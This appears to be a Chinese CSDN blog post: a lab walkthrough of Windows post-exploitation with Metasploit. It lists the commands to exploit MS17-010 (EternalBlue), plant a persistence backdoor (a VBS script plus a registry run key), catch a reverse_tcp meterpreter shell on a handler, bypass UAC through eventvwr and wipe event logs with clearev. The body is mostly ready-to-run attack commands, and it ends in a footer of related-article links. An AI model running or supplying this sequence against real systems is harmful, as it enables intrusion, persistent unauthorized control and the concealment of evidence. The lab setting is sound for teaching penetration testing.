后渗透:创建持久化服务并验证

最新推荐文章于 2024-07-08 22:09:55 发布
最新推荐文章于 2024-07-08 22:09:55 发布
阅读量212 收藏 1
点赞数 9
文章标签: linux 运维 服务器 web安全 安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_61415450/article/details/139238186
版权

预备知识


当成功获取目标系统的访问权限后,需要寻找方法来恢复与目标主机的连接,而无需再进入目标系统。如果目标用户破坏了该连接,例如 重新启动计算机,此时使用后门将允许自动重新与目标系统建立连接, 不必每次都需要进行攻击取得 metrpreter 。 

实验环境

攻击机:kali-linux 192.168.200.147

靶机:永恒之蓝 192.168.200.133

实验过程

我们先用永恒之蓝的经典sm17-010漏洞获取靶机的shell。

msfconsole  #进入msf控制台

search  17-010  #搜索模板

use 0

set rhost 192.168.200.133  #输入靶机ip

set lhost 192.168.200.147  #输入本机IP

run

获取shell后,我们切出shell界面,使用模板 exploit/windows/local/persistence (用于创建通过启动项启动。会创建注册表,创建文件)

background  #切出shell界面并保留后台

search windows/local/persiste   #搜索模块

use 1

set session 1    #设置session进程(如果不知道是几,可以输入sessions查看,sessions -i 1可以返回shell界面

run

执行结束后,会在靶机 的C:/windows/Temp/下建立一个vbs文件( 持久脚本 ),该脚本会 自动在靶机上运行,同时 添加注册表键值 ,如下 :

完成木马植入后,我们新开窗口,使用监听模板use exploit/multi/handler

use exploit/multi/handler  

show options    #查看配置

set lhost 192.168.200.147  #设置本机IP

set payload windows/meterpreter/reverse_tcp  #设置负载系统

set lport 4444    #设置负载端口(额外注意这里的负载端口和前面植入木马的配置端口一致,默认是4444端口,如有变动按照上面的植入木马端口为准)

run

我们只需要重启靶机,不需要多余的操作,等待监听结果:

除此之外,我们还有可以提权的模块。例如exploit/windows/local/bypassuac_eventvwr 

search bypassuac  

use 7

set session 8  #这里的8,不一定是8,取决于你用sessions查询出你的挂载shell

run

这里显示我们已经是管理员用户了。那我们想删掉这些痕迹怎么办呢?可以使用clearev和resource 清除日志文件与删除持久化执行文件。

clearev

resource /root/.msf4/logs/persistence/WIN-JA4SR7L2AQ8_20240526.0159/WIN-JA4SR7L2AQ8_20240526.0159.rc

# 注意的是,这里的/root/.msf4/logs/persistence/WIN-JA4SR7L2AQ8_20240526.0159/WIN-JA4SR7L2AQ8_20240526.0159.rc 是我们前面生成木马的路径

可见效果:

弑月灼红
关注
  • 9
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
6.2. 持久化 - Windows
Sumarua的博客
07-07 1507
文章目录6.2. 持久化 - Windows6.2.1. 隐藏文件6.2.2. LOLBAS6.2.2.1. 简介6.2.2.2. 常见程序6.2.3. 后门6.2.3.1. sethc6.2.3.2. 映像劫持6.2.3.3. 定时任务6.2.3.4. 登录脚本6.2.3.5. 屏幕保护程序6.2.3.6. 隐藏用户6.2.3.7. CLR6.2.3.8. Winlogon Helper DLL后门6.2.4. UAC6.2.4.1. 简介6.2.4.2. 会触发UAC的操作6.2.4.3. ByPass
渗透测试:XSS漏洞定义及防护
WEL测试
12-22 910
什么是XSS XSS(cross site script)或者说跨站脚本是一种web应用程序的漏洞,恶意攻击者往web页面里插入恶意script代码,当用户浏览该页之时,嵌入其中web里面的script代码会被执行,从而达到恶意攻击用户的目的。 跨站脚本漏洞风险 盗取用户cookie,然后伪造用户身份登录,泄露用户个人身份及用户订单信息。 操控用户浏览器,借助其他漏洞可能会导致对https加密信息的破解,导致登录传输存在安全风险。 结合浏览器及其插件漏洞,下载病毒木马到浏览器的计算机上执行。 修改页面内容
渗透之——Metasploit访问控制的持久化
冰河的专栏
01-12 3267
转载请注明出处:https://blog.csdn.net/l1028386804/article/details/86358463 工具:Metasploit 为了实现这一点,可以选择在目标计算机上添加一个新的用户,也可以选择使用MSF中persistence模块。 运行persistence模块可以通过在目标计算机上安装一个永久性的后门来实现访问控制的持久化。这样,即使有一天目标计算机修...
Web渗透:php反序列化漏洞
WolvenSec的博客
06-25 917
反序列化漏洞(Deserialization Vulnerability)是一种在应用程序处理数据的过程中,因不安全的反序列化操作引发的安全漏洞;反序列化是指将序列化的数据(通常是字节流或字符串)转换回对象的过程,如果反序列化操作未进行适当的验证或消毒,攻击者可以通过精心构造的恶意数据进行攻击,执行任意代码、获取敏感信息、或破坏数据的完整性。本文我们就来探讨一下反序列化漏洞产生的原因和漏洞利用方法。
12.3、后渗透测试--持久化后门
无痕的博客
12-13 2140
metasploit后渗透测试--持久化后门
TryHackMe-进攻性渗透测试-15_活动目录持久化
M1n9K1n9的博客
12-26 395
终于也要接近尾声了,学了好几天的ad,每天花十几个小时进去,这段学习过程还算是有点难度的。
内网渗透测试:内网横向移动基础总结
从事厨房信息化行业,万能对接所有点餐系统,kds,智能控菜,酒店协调软件
06-12 94
Windows 7为跳板机用户名:douser密码:Dotest123Windows server 2008为域控(主机名:WIN-ENS2VR5TR3N)用户名:administrator密码:Liu78963攻击者已经获得了Windows7的权限,想要以Windows7作为跳板机进一步渗透内网的Windows server 2008,并且攻击者已经在跳板机上面通过socks代理等技术使自己可以访问到内网的Windows server 2008。
内网渗透系列:内网渗透思路整理
闵行小鱼塘
07-02 8264
整理下内网渗透的思路
内网渗透系列:横向渗透方法小结
闵行小鱼塘
08-04 4209
本文学习并小结下横向渗透的方法
红队内网攻防渗透:内网渗透之内网对抗:横向移动篇&入口差异&切换上线&IPC管道&AT&SC任务&Impacket套件&UI插件
06-22
IPC(Inter-Process Communication)管道是Windows系统中进程间通信的一种机制,攻击者可以利用它来控制远程系统,例如通过SMB协议执行命令或者利用Meterpreter等工具实现持久化。 AT(At Task)任务和SC(Service ...
完整渗透测试过程讲解
09-04
2. **建立后门**:创建持久访问通道,便于后续的监控或攻击。 八、清理与报告 1. **漏洞修复建议**:提供详细的漏洞报告,包含修复建议和优先级。 2. **测试结果沟通**:与客户分享测试结果,确保理解并采取适当...
关于安全渗透测试服务建议书的分析说明.zip
11-05
8. **后渗透活动**:研究是否存在持久化机制,如创建后门,以便在未来的攻击中快速重新进入系统。 9. **报告编写**:详细记录整个测试过程,包括步骤、发现的问题、影响及解决方案,供客户参考。 10. **修复建议**...
Metasploit渗透测试指南 修订版
09-21
此外,还会介绍payload的选择和定制,以及如何实现持久化访问,如创建后门。 对于post-exploitation阶段,书中会介绍如何在取得系统控制权后进行进一步的操作,如提升权限、收集敏感信息、横向移动和反取证。这些...
MSFconsole(msf渗透神器)windows平台可以 使用,亲测可用
11-27
MSFconsole可以辅助完成这些步骤,例如使用nmap模块进行端口扫描,利用exploits进行攻击,通过payloads在目标系统上建立持久化通道。 4. **Windows兼容性**:虽然Metasploit通常与Linux环境关联,但其Windows版本...
Linux】进程间通信——匿名管道
最新发布
2201_76024104的博客
07-08 715
1.:一个进程需要将它的数据发送给另一个进程,比如我们有两个进程,一个负责获取数据,另一个负责处理数据,这时第一个进程就要将获取到的数据交给第二个进程2.:多个进程间共享同样的资源3.:一个进程需要给其他进程发送消息,通知他们发生了某种事件4.:有些事件需要完全控制另一个进程,比如我们在使用gdb调试时,gdb就是一个进程,它控制了我们要调试的进程进程之前是有互相传递信息的需求,但是,一个进程不可能去另一个进程的地址空间中取信息,所以这就要求操作系统去提供一块交换数据的空间来供进程之间使用。
linux/shell】linux如何去除字符串中空格
qq_35902025的博客
07-06 317
linux如何去除字符串中空格 tr命令可以用来替换或删除字符 sed是一个流编辑器,可以用来处理文本
nginx安装(win和linux
f552126506的博客
07-07 530
nginx安装(win和linux
RedHat运维-LinuxSELinux基础4-端口绑定SELinux上下文
a15735748145a的博客
07-06 606
12. 将60001/tcp端口上的SELinux上下文由http_port_t调整为gopher_port_t的方法是______________________;13. 将60002/tcp端口上的SELinux上下文由gopher_port_t调整为ssh_port_t的方法是______________________;14. 将60003/tcp端口上的SELinux上下文由ssh_port_t调整为http_port_t的方法是_______________________;
尚硅谷佟刚 Hibernate1
08-03
创建好了持久化类、对象-关系映射文件和Hibernate配置文件之后,就可以开始使用Hibernate进行数据库操作了。 Hibernate提供了一些API,可以直接调用来对数据库进行操作。比如,可以使用save方法将对象保存到数据库...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值